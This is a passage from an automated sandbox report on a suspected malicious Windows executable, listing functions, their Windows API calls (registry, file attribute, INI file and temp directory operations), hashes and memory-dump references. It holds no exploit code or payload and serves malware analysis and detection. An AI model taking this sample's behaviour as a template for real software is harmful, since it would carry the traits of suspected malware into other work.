Associated: 00000000.00000002.2248248748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd

Similarity

API ID: Char$Next$CreateDirectoryPrev
String ID: 1033$C:\Users\user\AppData\Local\Temp\
API String ID: 4115351271-3512041753
Opcode ID: a1a2ae83a12f69ff64746ab71598c024736d7db69addb4c9484161c0f5351619
Instruction ID: 8de04b408351475945b63aae0c0c4e12a59e1662d208add100ced368eac5ea97
Opcode Fuzzy Hash: a1a2ae83a12f69ff64746ab71598c024736d7db69addb4c9484161c0f5351619
Instruction Fuzzy Hash: ACD09222156936B1D551322A3E06BCF190D8F467AEB22807BF844B90964A6C0AC219FE

Function 004023DE Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00402BDA: RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402C02

RegQueryValueExW.ADVAPI32(00000000,00000000,?,00000800,?,?,?,?,00000033), ref: 0040240F
RegCloseKey.ADVAPI32(?,?,?,C:\Program Files (x86)\edelweissen\romanblade.ini,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AA

Memory Dump Source

Source File: 00000000.00000002.2247987374.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2247963237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248037574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID:
API String ID: 3677997916-0
Opcode ID: 5e542bf7818b07f6a551f26b0d5f0384b4abb7536ca9c61697919048d63bf7a4
Instruction ID: a158a5aacad5cf38e27217d247968545a00c68d90011b7c89b18f36f64d1e3ee
Opcode Fuzzy Hash: 5e542bf7818b07f6a551f26b0d5f0384b4abb7536ca9c61697919048d63bf7a4
Instruction Fuzzy Hash: 4011A371910205EFDB10CFA0D6585AE77B4EF44355F20843FE042A72C0D6B84A85DB1A

Function 00401F08 Relevance: 3.1, APIs: 2, Instructions: 55memoryCOMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.KERNELBASE(00000000,?,000000EE), ref: 00401F17
GlobalAlloc.KERNEL32(00000040,00000000), ref: 00401F39

Part of subcall function 00405C8D: wsprintfW.USER32 ref: 00405C9A

Memory Dump Source

Source File: 00000000.00000002.2247987374.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2247963237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248037574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd

Similarity

API ID: AllocFileGlobalInfoSizeVersionwsprintf
String ID:
API String ID: 1691843260-0
Opcode ID: 3e36e6059fa465f8b0de5d4d74652fe28b5c7b8050137b23430cd001ac3cf941
Instruction ID: 8ab53c93760d54e15c8d206721566b5ff93d1c6769f111ab103972edef9fb44c
Opcode Fuzzy Hash: 3e36e6059fa465f8b0de5d4d74652fe28b5c7b8050137b23430cd001ac3cf941
Instruction Fuzzy Hash: B8114871A00109BFDB01DFA5CD44CAEBBB9EF44354F10407AF901E62E1E7789A50DB68

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000000.00000002.2247987374.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2247963237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248037574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: da452d76ac9ea1a5bb0b486d2f6a108081b9f7ccbaee280f2a8f0c090cfa8d80
Instruction ID: adb52dfa00387397cd87161f5118bdb5a91708942fcdcec178a456792abf2482
Opcode Fuzzy Hash: da452d76ac9ea1a5bb0b486d2f6a108081b9f7ccbaee280f2a8f0c090cfa8d80
Instruction Fuzzy Hash: 5101F4316202209BE7095B389D09B6A76D8E711719F10863FF851F72F1D6B8CC429B4C

Function 004050CD Relevance: 3.0, APIs: 2, Instructions: 32comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 004050DD

Part of subcall function 00403FE1: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00403FF3

CoUninitialize.COMBASE(00000404,00000000), ref: 00405129

Memory Dump Source

Source File: 00000000.00000002.2247987374.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2247963237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248037574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd

Similarity

API ID: InitializeMessageSendUninitialize
String ID:
API String ID: 2896919175-0
Opcode ID: 10ef6d87f3fd7bea8bde0a3b6e3cee34a91868ef9ffca7f293b6e213662e1e0e
Instruction ID: cb2347d6cbc19b0f628d54f49591885684dc807da670f32007c6c40ab910fdb0
Opcode Fuzzy Hash: 10ef6d87f3fd7bea8bde0a3b6e3cee34a91868ef9ffca7f293b6e213662e1e0e
Instruction Fuzzy Hash: A8F024339006008BD3016BA1AD02B977764FBC4306F09403AEE44762E1DBB658018B5D

Function 004059CF Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(00000003,00402D3F,C:\Users\user\Desktop\ro7eoySJ9q.exe,80000000,00000003,?,?,?,00000000,004033FE,?), ref: 004059D3
CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,004033FE,?), ref: 004059F5

Memory Dump Source

Source File: 00000000.00000002.2247987374.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2247963237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248037574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 37c4dc7839c603de99ed6860e60369df17b6bb7e4a2ae391e088aaa007eea51a
Instruction ID: 1eb9dddf645dfc1e42ea27fadde30db719d7f554b9b2fef872a17e27e5e15d7e
Opcode Fuzzy Hash: 37c4dc7839c603de99ed6860e60369df17b6bb7e4a2ae391e088aaa007eea51a
Instruction Fuzzy Hash: C0D09E71654601EFEF098F20DE16F6EBBA2EB84B00F11952DB692940E0DA7158199B15

Function 004059AA Relevance: 3.0, APIs: 2, Instructions: 13COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,?,00405599,?,?,00000000,00405785,?,?,?,?), ref: 004059AF
SetFileAttributesW.KERNEL32(?,00000000), ref: 004059C3

Memory Dump Source

Source File: 00000000.00000002.2247987374.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2247963237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248037574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 05994f7bb8a1ec96a0acbdf87cb19798dc47de50d2a954d4e2c693c8e603d6f5
Instruction ID: 5089437a0038f9672fdec650e2f42df5ceafcb3a9c98f83db2fa6512ef2061e4
Opcode Fuzzy Hash: 05994f7bb8a1ec96a0acbdf87cb19798dc47de50d2a954d4e2c693c8e603d6f5
Instruction Fuzzy Hash: 09D012B2504520EFC2103728EF0C89BBF65DB543717028B35FDB5A22F0CB304C568A99

Function 00402251 Relevance: 1.5, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 00402288

Memory Dump Source

Source File: 00000000.00000002.2247987374.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2247963237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248037574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd

Similarity

API ID: PrivateProfileStringWrite
String ID:
API String ID: 390214022-0
Opcode ID: 45cd240e89cb35acd2adb5c5489ef0982fec4b8f4934da7d4fbc5eb992d52d3a
Instruction ID: 0b657d416b15e43c0193b3f865d343ab07691dd64d9d569c69532df3a91b5b61
Opcode Fuzzy Hash: 45cd240e89cb35acd2adb5c5489ef0982fec4b8f4934da7d4fbc5eb992d52d3a
Instruction Fuzzy Hash: 82E0BF32A045696ADB2036F20E8D97F30589B54754F15057FB513BA1C2DDFC0D815AAD

Function 00403160 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,00402F8B,000000FF,00000004,00000000,00000000,00000000), ref: 00403177

Memory Dump Source

Source File: 00000000.00000002.2247987374.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2247963237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248037574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 233ad9278b8c44b78323ef9ef70cff2e7f1b2f0f6aab1e28ab7980f1b25ba47d
Instruction ID: 71aeb53177ba50d05d0cf1bc79962ee68b95cc51097d41dc468827112562ad25
Opcode Fuzzy Hash: 233ad9278b8c44b78323ef9ef70cff2e7f1b2f0f6aab1e28ab7980f1b25ba47d
Instruction Fuzzy Hash: 88E08C32114218BBCF205FA19C04AE73F5CEB093A2F00C03ABD18E9290D234DA15DBE8

Function 00402BDA Relevance: 1.5, APIs: 1, Instructions: 22registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402C02

Memory Dump Source

Source File: 00000000.00000002.2247987374.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2247963237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248037574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: cce1f9145786d5949352606fac99e7e5e067a1059cfd452124556763b682a866
Instruction ID: 3dbf039cb61568b40e8fd4d19fef357c16506d2f59f835c7eaccd1bdbf02c8de
Opcode Fuzzy Hash: cce1f9145786d5949352606fac99e7e5e067a1059cfd452124556763b682a866
Instruction Fuzzy Hash: A3E04676290108AFDB00EFA4EE4AFD93BECAB08704F008021B609E6091DA74F5408B6C

Function 00402293 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 004022C4

Memory Dump Source

Source File: 00000000.00000002.2247987374.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2247963237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248037574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd

Similarity

API ID: PrivateProfileString
String ID:
API String ID: 1096422788-0
Opcode ID: 74d14b167e5f6999f806f0de9605a955cbc6b2f8afcacdbae3200fcd2487e3c0
Instruction ID: 032603440061492facc866799902dc36791b8dee2dcfc8dfbdbcdfe83c4889f9
Opcode Fuzzy Hash: 74d14b167e5f6999f806f0de9605a955cbc6b2f8afcacdbae3200fcd2487e3c0
Instruction Fuzzy Hash: FCE0BF71940208BADB10AFA1CD49AED3A68EF01754F10443AF552BB0D1EAF995C1AB59

Function 0040159B Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015A6

Memory Dump Source

Source File: 00000000.00000002.2247987374.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2247963237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248037574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: e8bb238b6c1997d302efcbd6551df5b11c37b88c8e9cb2d5373f431501d37c19
Instruction ID: 561d33903432245b5a5ec808ba248510e0ad320ee7677a05499f6c71c576feb8
Opcode Fuzzy Hash: e8bb238b6c1997d302efcbd6551df5b11c37b88c8e9cb2d5373f431501d37c19
Instruction Fuzzy Hash: 54D01772704112DBCB10EBE9AA0869D7AA49B41369F204537D212F21D0D6B89585AB2E

Function 00403FE1 Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00403FF3

Memory Dump Source

Source File: 00000000.00000002.2247987374.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2247963237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248037574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
